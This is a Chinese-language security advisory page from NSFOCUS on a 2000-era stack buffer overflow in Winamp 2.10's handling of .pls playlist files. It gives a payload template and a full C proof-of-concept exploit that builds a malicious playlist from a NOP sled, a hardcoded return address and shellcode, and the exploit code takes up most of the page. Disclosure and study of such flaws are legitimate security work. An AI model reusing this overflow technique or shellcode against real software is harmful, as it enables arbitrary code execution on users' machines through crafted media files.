首页 -> 安全研究

安全研究

安全漏洞
Winamp 2.10缓冲区溢出漏洞

发布日期:2000-01-07
更新日期:2000-01-07

受影响系统:
Nullsoft Winamp 2.10
+Windows 95/98/NT
描述:
当winamp 2.10处理.pls文件时,可能发生缓冲区溢出.当一个.pls文件(里面通常提供播放
mp3文件的列表)中含有超过580字节的项时,溢出就会发生.

攻击者可以通过构造一个类似下面的.pls文件来执行任意命令:

[playlist]
File1=<580 bytes><eip><shell code>
NumberOfEntries=1


<* 来源:     Steve Fewer, darkplan@oceanfree.net
   相关链接: http://indigo.ie/~lmf
*>  


测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

/* Stack based buffer overflow exploit for Winamp v2.10
* Author Steve Fewer, 04-01-2k. Mail me at darkplan@oceanfree.net
*
* For a detailed description on the exploit see my advisory.
*
* Tested with Winamp v2.10 using Windows98 on an Intel
* PII 400 with 128MB RAM
*
* http://indigo.ie/~lmf
*/

#include <stdio.h>

int main()
{

printf("\n\n\t\t.......................................\n");
printf("\t\t......Nullsoft Winamp 2.10 exploit.....\n");
printf("\t\t.......................................\n");
printf("\t\t.....Author: Steve Fewer, 04-01-2k.....\n");
printf("\t\t.........http://indigo.ie/~lmf.........\n");
printf("\t\t.......................................\n\n");

char buffer[640];
char eip[8] = "\xF7\xCF\xB9\xBF";
char sploit[256] = "\x55\x8B\xEC\x33\xC0\x50\x50\x50\xC6\x45\xF4\x4D\xC6\x45\xF5\x53
\xC6\x45\xF6\x56\xC6\x45\xF7\x43\xC6\x45\xF8\x52\xC6\x45\xF9\x54\xC6\x45\xFA\x2E\xC6
\x45\xFB\x44\xC6\x45\xFC\x4C\xC6\x45\xFD\x4C\xBA\xD4\x76\xF7\xbF\x52\x8D\x45\xF4\x50
\xFF\x55\xF0\x55\x8B\xEC\x33\xFF\x57\xC6\x45\xFC\x48\xC6\x45\xFD\x69\xC6\x45\xFE\x21
\xBA\x2E\x41\xF5\xBF\x52\x57\x8D\x55\xFC\x52\x52\x57\xFF\x55\xF8\x55\x8B\xEC\xBA\xFF
\xFF\xFF\xFF\x81\xEA\xFB\xAA\xFF\x87\x52\x33\xC0\x50\xFF\x55\xFC";

FILE *file;

for(int x=0;x<580;x++)
{
buffer[x] = 0x90;
}

file = fopen("crAsh.pls","wb");

fprintf(file, "[playlist]\n");
fprintf(file, "File1=");
fprintf(file, "%s", buffer);
fprintf(file, "%s", eip);
fprintf(file, "%s", sploit);
fprintf(file, "\nNumberOfEntries=1");

fclose(file);
printf("\t created file crAsh.pls loaded with the exploit.\n");
return 0;
}



建议:
暂无

浏览次数:6599
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障